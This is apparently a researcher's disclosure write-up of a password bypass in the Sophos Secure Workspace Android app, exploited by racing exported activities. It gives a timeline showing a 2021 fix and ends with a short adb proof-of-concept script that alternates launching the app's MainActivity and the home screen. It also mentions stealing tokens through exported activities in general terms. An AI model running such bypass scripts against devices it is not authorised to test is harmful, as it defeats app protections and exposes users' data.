Sophos Secure Workspace App Password Bypass using Race Condition
- Sophos quickly resolved this issue on September 27th 2021.
An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.
During a Mobile Penetration Engagement, I always check the App components that are exported, This means that they can be directly called by other Applications. In some cases these exported apps can be use as a leverage to bypass app restrictions ;)
Identifying Exported Activities
You can look for Exported Activities in the App’s AndroidManifest.xml
- If the activity has android:exported=“true”
- If android:exported is missing but it has atleast one intent-filter
Here is an Example of a Exported Activity
<activity android:exported="true" android:name="com.app.damnvulnerablebank.SendMoney">
Exported activity with intent filter
<activity android:name="com.app.damnvulnerablebank.SplashScreen"> <intent-filter> <action android:name="android.intent.action.MAIN"/> <category android:name="android.intent.category.LAUNCHER"/> </intent-filter>
You can also use drozer to automate finding exported activities, But I would not recommend this since automated tools are likely to miss something.
I found one, But now what do i do?
The exploitation of this relies on the functionality of the Activity. If the app uses android-webview We can get an XSS or Open redirect. If you found an activity that export or upload file maybe we can use it to steal sensitive files i.e user token and others.
- September 04, 2021 - Reported the Vulnerability to Sophos.
- September 09, 2021 - Sophos acknowledges the Vulnerability.
- September 27, 2021 - Update
9.7.3115was released on Google play fixing the bug.
Advisory and CVE
Proof of Concept
The script below automates the process to exploit this vulnerability
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity sleep 0.5 adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME sleep 0.5 adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity sleep 0.5 adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME sleep 0.5 adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity